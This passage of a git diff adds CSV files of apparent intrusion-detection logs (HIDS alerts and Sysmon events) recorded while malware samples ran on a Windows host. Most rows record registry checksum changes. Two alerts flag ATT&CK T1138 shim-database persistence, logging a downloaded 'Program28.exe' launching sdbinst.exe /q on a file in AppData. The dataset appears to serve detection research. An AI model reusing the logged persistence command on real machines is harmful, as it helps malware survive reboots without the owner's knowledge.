recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,,,, +"May 31, 2020 @ 09:37:21.287",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",,,, +"May 31, 2020 @ 09:32:40.919",10,"Multiple Windows error events","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\SYSTEM; ClientProcessId = 2992; Component = Unknown; Operation = Start IWbemServices::ExecQuery - root\Microsoft\Windows\DeviceGuard : SELECT AvailableSecurityProperties FROM Win32_DeviceGuard ; ResultCode = 0x80041032; PossibleCause = Unknown""",,,, +"May 31, 2020 @ 09:31:25.960",14,"ATT&CK T1138: Possible Shim Database Persistence via sdbinst.exe","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:48:30.458 +ProcessGuid: {df9fc3d3-b31e-5ecf-0000-0010800a1300} +ProcessId: 6504 +Image: C:\Windows\SysWOW64\sdbinst.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Application Compatibility Database Installer +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sdbinst.exe +CommandLine: ""C:\Windows\SysWOW64\sdbinst.exe"" /q ""C:\Users\John Williams\AppData\LocalLow\hPb0FP3y.sdb"" +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020ce750300} +LogonId: 0x375CE +TerminalSessionId: 1 +IntegrityLevel: High +Hashes: MD5=90B941232094F8C281AE47F8C9C8C0CF,SHA256=1B0883DA2CC4C1959D3FE8F6DE63FF9AD85F7CF9B229879C6F54B734E2C5F14D,IMPHASH=DC04DAC563E65A0D0DAE0ACCC2AC61E2 +ParentProcessGuid: {df9fc3d3-b313-5ecf-0000-001075e51200} +ParentProcessId: 316 +ParentImage: C:\Users\John Williams\Downloads\Program28.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\Program28.exe"" ""","\""C:\\Windows\\SysWOW64\\sdbinst.exe\"" /q \""C:\\Users\\John Williams\\AppData\\LocalLow\\hPb0FP3y.sdb\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:48:30.460512700Z"",""eventRecordID"":""1991"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:48:30.458\r\nProcessGuid: {df9fc3d3-b31e-5ecf-0000-0010800a1300}\r\nProcessId: 6504\r\nImage: C:\\Windows\\SysWOW64\\sdbinst.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Application Compatibility Database Installer\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sdbinst.exe\r\nCommandLine: \""C:\\Windows\\SysWOW64\\sdbinst.exe\"" /q \""C:\\Users\\John Williams\\AppData\\LocalLow\\hPb0FP3y.sdb\""\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020ce750300}\r\nLogonId: 0x375CE\r\nTerminalSessionId: 1\r\nIntegrityLevel: High\r\nHashes: MD5=90B941232094F8C281AE47F8C9C8C0CF,SHA256=1B0883DA2CC4C1959D3FE8F6DE63FF9AD85F7CF9B229879C6F54B734E2C5F14D,IMPHASH=DC04DAC563E65A0D0DAE0ACCC2AC61E2\r\nParentProcessGuid: {df9fc3d3-b313-5ecf-0000-001075e51200}\r\nParentProcessId: 316\r\nParentImage: C:\\Users\\John Williams\\Downloads\\Program28.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\Program28.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-28 12:48:30.458"",""processGuid"":""{df9fc3d3-b31e-5ecf-0000-0010800a1300}"",""processId"":""6504"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\sdbinst.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Application Compatibility Database Installer"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sdbinst.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\SysWOW64\\\\sdbinst.exe\\\"" /q \\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\LocalLow\\\\hPb0FP3y.sdb\\\"""",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020ce750300}"",""logonId"":""0x375ce"",""terminalSessionId"":""1"",""integrityLevel"":""High"",""hashes"":""MD5=90B941232094F8C281AE47F8C9C8C0CF,SHA256=1B0883DA2CC4C1959D3FE8F6DE63FF9AD85F7CF9B229879C6F54B734E2C5F14D,IMPHASH=DC04DAC563E65A0D0DAE0ACCC2AC61E2"",""parentProcessGuid"":""{df9fc3d3-b313-5ecf-0000-001075e51200}"",""parentProcessId"":""316"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\Program28.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\Program28.exe\\\""""}}}", +"May 31, 2020 @ 09:31:15.123",14,"ATT&CK T1138: Possible Shim Database Persistence via sdbinst.exe","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:48:19.451 +ProcessGuid: {df9fc3d3-b313-5ecf-0000-001014f01200} +ProcessId: 6188 +Image: C:\Windows\SysWOW64\sdbinst.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Application Compatibility Database Installer +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sdbinst.exe +CommandLine: ""C:\Windows\System32\sdbinst.exe"" /q ""C:\Users\John Williams\AppData\LocalLow\hPb0FP3y.sdb"" +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=90B941232094F8C281AE47F8C9C8C0CF,SHA256=1B0883DA2CC4C1959D3FE8F6DE63FF9AD85F7CF9B229879C6F54B734E2C5F14D,IMPHASH=DC04DAC563E65A0D0DAE0ACCC2AC61E2 +ParentProcessGuid: {df9fc3d3-b313-5ecf-0000-001075e51200} +ParentProcessId: 316 +ParentImage: C:\Users\John Williams\Downloads\Program28.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\Program28.exe"" ""","\""C:\\Windows\\System32\\sdbinst.exe\"" /q \""C:\\Users\\John Williams\\AppData\\LocalLow\\hPb0FP3y.sdb\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:48:19.455789600Z"",""eventRecordID"":""1989"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:48:19.451\r\nProcessGuid: {df9fc3d3-b313-5ecf-0000-001014f01200}\r\nProcessId: 6188\r\nImage: C:\\Windows\\SysWOW64\\sdbinst.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Application Compatibility Database Installer\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sdbinst.exe\r\nCommandLine: \""C:\\Windows\\System32\\sdbinst.exe\"" /q \""C:\\Users\\John Williams\\AppData\\LocalLow\\hPb0FP3y.sdb\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=90B941232094F8C281AE47F8C9C8C0CF,SHA256=1B0883DA2CC4C1959D3FE8F6DE63FF9AD85F7CF9B229879C6F54B734E2C5F14D,IMPHASH=DC04DAC563E65A0D0DAE0ACCC2AC61E2\r\nParentProcessGuid: {df9fc3d3-b313-5ecf-0000-001075e51200}\r\nParentProcessId: 316\r\nParentImage: C:\\Users\\John Williams\\Downloads\\Program28.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\Program28.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-28 12:48:19.451"",""processGuid"":""{df9fc3d3-b313-5ecf-0000-001014f01200}"",""processId"":""6188"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\sdbinst.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Application Compatibility Database Installer"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sdbinst.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\sdbinst.exe\\\"" /q \\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\LocalLow\\\\hPb0FP3y.sdb\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=90B941232094F8C281AE47F8C9C8C0CF,SHA256=1B0883DA2CC4C1959D3FE8F6DE63FF9AD85F7CF9B229879C6F54B734E2C5F14D,IMPHASH=DC04DAC563E65A0D0DAE0ACCC2AC61E2"",""parentProcessGuid"":""{df9fc3d3-b313-5ecf-0000-001075e51200}"",""parentProcessId"":""316"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\Program28.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\Program28.exe\\\""""}}}", diff --git a/data/MW_28_NIDS.csv b/data/MW_28_NIDS.csv new file mode 100644 index 0000000..03c3de0 --- /dev/null +++ b/data/MW_28_NIDS.csv @@ -0,0 +1 @@ +"@timestamp",message,"log.file.path" diff --git a/data/MW_29_HIDS_3.csv b/data/MW_29_HIDS_3.csv new file mode 100644 index 0000000..fd8315d --- /dev/null +++ b/data/MW_29_HIDS_3.csv @@ -0,0 +1,22 @@ +timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","data.win.eventdata.targetObject","full_log","data.win.eventdata.details" +"May 31, 2020 @ 12:01:28.309",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '9cff44496a5ed58ecd06ce03fe6410f8' +New md5sum is : '4851a8fa9ed6c37f76f4ef6c0dd6d33e' +Old sha1sum was: '19ebed2ea7007c5bd2580630b03830bb0b2dee87' +New sha1sum is : '96ff488eeb3d9b9ede478b6e2d70a97d2cd5d937' +", +"May 31, 2020 @ 12:01:28.293",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '09f9a868702d8a69d4b62b6dc4365b29' +New md5sum is : 'd81f7e509f5c1a9330ce7886a815c11b' +Old sha1sum was: '4c3792c463152bc8effee78473d7f3b3c0e8e25e' +New sha1sum is : '032f00848ab7f2fe55a7b63edfa8c5598fbf5268' +", +"May 31, 2020 @ 12:01:23.934",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_WINDOWEDSELECTCONTROL' checksum changed. +Old md5sum was: '370914f65a755a1cbfcf0c873b11feaa' +New md5sum is : '1c729912f87f9abbd1574176fc5996f7' +Old sha1sum was: 'ea4c2f8e1a1dc5de73a98dbadb5abff9297c9a4b' +New sha1sum is : '1d2094dc263dc3db258f4421536e179cfbd9cfb0' +", +"May 31, 2020 @ 12:00:03.886",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,,,, +"May 31, 2020 @ 11:59:52.068",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",,,, +"May 31, 2020 @ 11:57:21.267",10,"Multiple Windows error events","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\SYSTEM; ClientProcessId = 5956; Component = Unknown; Operation = Start IWbemServices::ExecQuery - ROOT\WMI : SELECT * FROM BatteryFullChargedCapacity; ResultCode = 0x80041010; PossibleCause = Unknown""",,,, diff --git a/data/MW_29_NIDS.csv b/data/MW_29_NIDS.csv new file mode 100644 index 0000000..03c3de0 --- /dev/null +++ b/data/MW_29_NIDS.csv @@ -0,0 +1 @@ +"@timestamp",message,"log.file.path" diff --git a/data/MW_2_HIDS_1.csv b/data/MW_2_HIDS_1.csv new file mode 100644 index 0000000..6f4da01 --- /dev/null +++ b/data/MW_2_HIDS_1.csv @@ -0,0 +1,292 @@ +timestamp,"rule.level","rule.description","full_log" +"Apr 4, 2020 @ 14:54:49.932",3,"Service startup type was changed", +"Apr 4, 2020 @ 14:53:40.040",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '5695135f1e3e443110a19087874cd50b' +New md5sum is : '39fa8d517b6e993129cb1768e34e286b' +Old sha1sum was: '1bb9b229f52d7794cdc2af9e0ddd088c35f0f43b' +New sha1sum is : 'd04aaebc7b10b3efc225f513253c8d8a0a4b69b2' +" +"Apr 4, 2020 @ 14:53:40.009",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'fed2b06cbd07fe85425f98eb7f3d3216' +New md5sum is : '5c846d33afca4692d83a3ab365ad6442' +Old sha1sum was: 'f940226ddc3f6eb8eb086a431f6a56b8f2b955d2' +New sha1sum is : '084d92d987ccfb645a193f074fd7a6b45d5fd358' +" +"Apr 4, 2020 @ 14:53:38.650",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System' checksum changed. +Old md5sum was: '401e534489c4201969c73e3417a991dd' +New md5sum is : 'c8ac4b841c008e3ac0a8a192544d37c5' +Old sha1sum was: 'e32cf50732d765aaecb1f3cf7b634619089e4aaa' +New sha1sum is : 'e0866d0f9ff0c9fa64a69a11948050e82fbb6b83' +" +"Apr 4, 2020 @ 14:53:37.947",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System' checksum changed. +Old md5sum was: '401e534489c4201969c73e3417a991dd' +New md5sum is : 'c8ac4b841c008e3ac0a8a192544d37c5' +Old sha1sum was: 'e32cf50732d765aaecb1f3cf7b634619089e4aaa' +New sha1sum is : 'e0866d0f9ff0c9fa64a69a11948050e82fbb6b83' +" +"Apr 4, 2020 @ 14:53:36.446",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_2a06c' was added. +" +"Apr 4, 2020 @ 14:53:36.431",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_2a06c\Security' was added. +" +"Apr 4, 2020 @ 14:53:27.280",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'b7ec5bb81f333ea85396b0877ce994bf' +New md5sum is : '91ea775bba23dd9cceea947be23278d7' +Old sha1sum was: '287349b3de03079e399dece2ffa8aaec1820117b' +New sha1sum is : 'e9082bc8c1dfe0b8116a7ee67589dc469a8c5010' +" +"Apr 4, 2020 @ 14:53:27.265",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '1fc4b44bbc6d9c106ac0a4752d93e35e' +New md5sum is : '1b10e1576592aeeae76e193943cd085c' +Old sha1sum was: 'd6ef55e2e093129301c899b328d315bfac96c7ee' +New sha1sum is : 'a6d019de337f5367f57b5bcd76850390daa35c1c' +" +"Apr 4, 2020 @ 14:53:26.479",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: 'e568d386d27113eb1ba52bfb132bb787' +New md5sum is : '57f8b6b5db75343af171f0dc0bacde47' +Old sha1sum was: 'a28c9a87bd38a849dd4a592671950344f9551692' +New sha1sum is : '157cf70bc23044f99a540eb0baef93821371fa62' +" +"Apr 4, 2020 @ 14:53:25.118",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: 'c24356a255f876bd6fccfcb32936aae9' +New md5sum is : '61ab47c110186181be5841f0689573b8' +Old sha1sum was: 'bbde208ff893d96d36d0af5f942c549646a33ded' +New sha1sum is : '84a0f5edd7ca01077ce40b0b34caf30a5c540757' +" +"Apr 4, 2020 @ 14:53:24.853",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. +Old md5sum was: 'f11cbdccb5777fd847f978820b366ff8' +New md5sum is : 'c32dbb6e4a029edba187f66eac6c1771' +Old sha1sum was: '51b54373018e415c4da2fd612ecf45ba322d2873' +New sha1sum is : '1b63705b0d28aa7de76ce2d2119384141a028dda' +" +"Apr 4, 2020 @ 14:53:24.275",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_2a06c' was added. +" +"Apr 4, 2020 @ 14:53:24.248",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_2a06c\Security' was added. +" +"Apr 4, 2020 @ 14:53:24.072",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. +Old md5sum was: '50992766142f23c322b3c8834e7fe949' +New md5sum is : 'de248ef71f0126e55ddff7772849bfa0' +Old sha1sum was: '90ccc9868e860e19d9c2a434a79aabacf4de45c2' +New sha1sum is : 'a4cf18306b521d7187328ff01821349e7e257550' +" +"Apr 4, 2020 @ 14:53:23.837",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: 'd27458f33cbff01c47ffde09dbc053f1' +New md5sum is : '080661a6d8f55396459d821708e47f0d' +Old sha1sum was: '02a003fd0ed73b38768c7e5710bf909d35b5838a' +New sha1sum is : '4903700cc0ab8761b803864ec3e77436515ad056' +" +"Apr 4, 2020 @ 14:53:23.348",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_2a06c' was added. +" +"Apr 4, 2020 @ 14:53:23.308",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_2a06c\Security' was added. +" +"Apr 4, 2020 @ 14:53:22.681",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. +Old md5sum was: 'bfaa185ae33cb6476403d7acf06a7c9d' +New md5sum is : '61ab47c110186181be5841f0689573b8' +Old sha1sum was: 'be8c3559f5d0a63e3b035c71193591f824e4b369' +New sha1sum is : '84a0f5edd7ca01077ce40b0b34caf30a5c540757' +" +"Apr 4, 2020 @ 14:53:20.446",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. +Old md5sum was: '9fc65fde0729dc43624c26720f88c410' +New md5sum is : '7bd9eb19c00055c3058e080d4f64f21b' +Old sha1sum was: '360f3fe841b4713603e18ee79890382e35160dd3' +New sha1sum is : '25ef63b1a2030e73ec882e5936b4ad7c09810c9d' +" +"Apr 4, 2020 @ 14:53:16.275",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 14:53:15.307",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules' checksum changed. +Old md5sum was: '4578ec56ccbb4264af718516ba89e48b' +New md5sum is : '06e6f475b1bd4f2c80027ef9d0a66d54' +Old sha1sum was: '9b534a06cbc8893f49a0a1f5f38d9e02792565b0' +New sha1sum is : '97ffaccc0569ace218f7b51c65a680af50f328f3' +" +"Apr 4, 2020 @ 14:53:14.853",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. +Old md5sum was: 'f4f4f95950e3c8f54a99c57e96ab2edb' +New md5sum is : 'aa60931ec92fca97978531f0dad7b0dd' +Old sha1sum was: 'c2a79a64bbeb6f5db068f732ac71e9fcc1893c13' +New sha1sum is : 'd4a922889d4722b5a792d685e5645b3da2e7c2d0' +" +"Apr 4, 2020 @ 14:53:14.806",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. +Old md5sum was: '671078222c6f28f8a987ef233af7d5a5' +New md5sum is : 'dc9f9e3fba782230828c1350ebdd6327' +Old sha1sum was: 'c62d69328b5a046dd8494e6a38df8074f8310102' +New sha1sum is : 'df82c4e7b328c25ab2a829fbb36079904d347a00' +" +"Apr 4, 2020 @ 14:53:06.463",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2a06c' was added. +" +"Apr 4, 2020 @ 14:53:06.446",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2a06c\Security' was added. +" +"Apr 4, 2020 @ 14:53:05.900",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2a06c' was added. +" +"Apr 4, 2020 @ 14:53:05.868",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2a06c\Security' was added. +" +"Apr 4, 2020 @ 14:53:04.196",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2a06c' was added. +" +"Apr 4, 2020 @ 14:53:04.165",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2a06c\Security' was added. +" +"Apr 4, 2020 @ 14:53:01.290",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: '3f03fecf7ce5aadefb5cab6ffaa05faa' +New md5sum is : 'c66b183a17660843a68e85ab0783b570' +Old sha1sum was: '28ce914f14dd2d187d30924e93ca0a6a7385abab' +New sha1sum is : '82d2a45ff16d72f993fb907a1d9432d297767914' +" +"Apr 4, 2020 @ 14:52:59.743",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: 'b8c3b69a51fc59b265023c4b7e9ed57f' +New md5sum is : 'c28024f789d0e17086a88a75440b3e55' +Old sha1sum was: 'e58cfda03bb6bdc0e0ce6fa9d7730eac7402a2fb' +New sha1sum is : 'e3a8730432f63c9cb6b89edce1afa857e55a623d' +" +"Apr 4, 2020 @ 14:52:58.759",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: '044589c37bc4852348838fb502a9a0ba' +New md5sum is : '48a50efbf42edd3d3af178271fb7fad4' +Old sha1sum was: '6dba2499db8b93171cc3064fe87359b07d9df7e9' +New sha1sum is : '7d220712a8daa09739da3a946c285a3ec85329b2' +" +"Apr 4, 2020 @ 14:52:58.619",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2a06c' was added. +" +"Apr 4, 2020 @ 14:52:58.603",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2a06c\TriggerInfo\0' was added. +" +"Apr 4, 2020 @ 14:52:58.587",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2a06c\Security' was added. +" +"Apr 4, 2020 @ 14:52:54.633",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: 'e0a88757732adb4d0d3a7edc290ee929' +New md5sum is : 'a7421ab81e260fb95e61bbd0617b8757' +Old sha1sum was: 'd318c91983cd767243b4a3d870ac9035a5c36a5f' +New sha1sum is : 'cbfb40a8144b212f0fdfa053000bf43102638185' +" +"Apr 4, 2020 @ 14:52:53.243",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: '3f03fecf7ce5aadefb5cab6ffaa05faa' +New md5sum is : 'c66b183a17660843a68e85ab0783b570' +Old sha1sum was: '28ce914f14dd2d187d30924e93ca0a6a7385abab' +New sha1sum is : '82d2a45ff16d72f993fb907a1d9432d297767914' +" +"Apr 4, 2020 @ 14:52:50.758",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'd7bd7fc504ac1841a21cde8f25341a4a' +New md5sum is : '5273eb6ce6ddc4cc85cc2038dd24bd3b' +Old sha1sum was: '4ac5259d3f2506c63bd0bb18af2f072b91c2fe73' +New sha1sum is : '73319e7c95ecb62647296057bac746d9a86b04d6' +" +"Apr 4, 2020 @ 14:52:49.993",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: '3f03fecf7ce5aadefb5cab6ffaa05faa' +New md5sum is : 'c66b183a17660843a68e85ab0783b570' +Old sha1sum was: '28ce914f14dd2d187d30924e93ca0a6a7385abab' +New sha1sum is : '82d2a45ff16d72f993fb907a1d9432d297767914' +" +"Apr 4, 2020 @ 14:52:48.149",3,"Windows Logon Success", +"Apr 4, 2020 @ 14:52:40.025",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: '8063f6fdc0522dd77a0610639c5056e4' +New md5sum is : '1b5a91bc3771d592416bfbadca5eaa21' +Old sha1sum was: '5ce924849d32af7b03c0706d5d5e2f7496eb461a' +New sha1sum is : '6b52b75fe3595cdaa03ca25c633d15755382428d' +" +"Apr 4, 2020 @ 14:52:33.915",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: '3146f0ba92fe0170094d9d545db4b252' +New md5sum is : '1add02cca992decdd3dbfd1a3afb1b66' +Old sha1sum was: '4d2f1ef3223c6acc42b5a3b6be685daaa743a056' +New sha1sum is : 'f052b598f0d90c3e4224e33ed5e8db0774b2a3ef' +" +"Apr 4, 2020 @ 14:52:32.680",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2a06c' was added. +" +"Apr 4, 2020 @ 14:52:32.649",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2a06c\Security' was added. +" +"Apr 4, 2020 @ 14:52:32.571",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2a06c' was added. +" +"Apr 4, 2020 @ 14:52:32.540",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2a06c\Security' was added. +" +"Apr 4, 2020 @ 14:52:32.212",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2a06c' was added. +" +"Apr 4, 2020 @ 14:52:32.181",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2a06c\Security' was added. +" +"Apr 4, 